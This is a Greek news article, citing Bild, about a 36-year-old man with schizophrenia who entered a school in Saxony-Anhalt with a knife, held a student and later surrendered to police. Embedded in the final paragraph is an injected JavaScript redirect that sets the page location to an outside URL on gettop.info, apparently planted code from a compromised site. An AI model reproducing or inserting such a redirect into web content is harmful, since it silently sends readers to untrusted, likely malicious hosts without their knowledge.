Σχιζοφρενής εισέβαλε με μαχαίρι σε γερμανικό σχολείο (EIKONEΣ)

0
6

 

Σύμφωνα με την «Bild» 36χρονος άνδρας που πάσχει από σχιζοφρένεια εισέβαλε σε σχολείο στο κρατίδιο Σαξoνίας – Άνχαλτ της Γερμανίας. Ο άνδρας φέρεται να έβαλε το μαχαίρι στον λαιμό ενός μαθητή ενώ απείλησε μαθητές και καθηγητές.

saxony-maxairi-sxleio

Οι μαθητές εκκένωσαν το κτίριο ενώ κράτησε μέσα σε μία σχολική αίθουσα έναν μαθητή. Ο διευθυντής του γυμνασίου κάλεσε αμέσως την αστυνομία που έσπευσε στο σημείο. Φέρεται αστυνομικοί να μπήκαν στην αίθουσα και αφού συζήτησαν με τον δράστη, εκείνος παραδόθηκε.

saxony-maxairi-astynomia-sxoleio-2

Αρχικά αναφέρεται ότι ο 36χρονος απείλησε να αυτοτραυματιστεί με το μαχαίρι του αλλά τελικά πείσθηκε και το άφησε κάτω. Ακόμη παραμένουν άγνωστα τα κίνητρα της ενέργειάς του. Αυτό που είναι γνωστό είναι ότι είναι κάτοικος της περιοχής ενώ ζει επιτηρούμενος λόγω της ψυχολογικής του κατάστασης.  Εισέβαλε κατευθείαν σε αίθουσα της ογδόης τάξης ενώ παρά την επιθετικότητά του δεν αντέδρασε στην αστνυομική παρουσία. Οι μαθητές έχουν υποστεί σοκ και κλαiνε στις αγκαλιές των καθηγητών τους, σύμφωνα με την B.ild setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here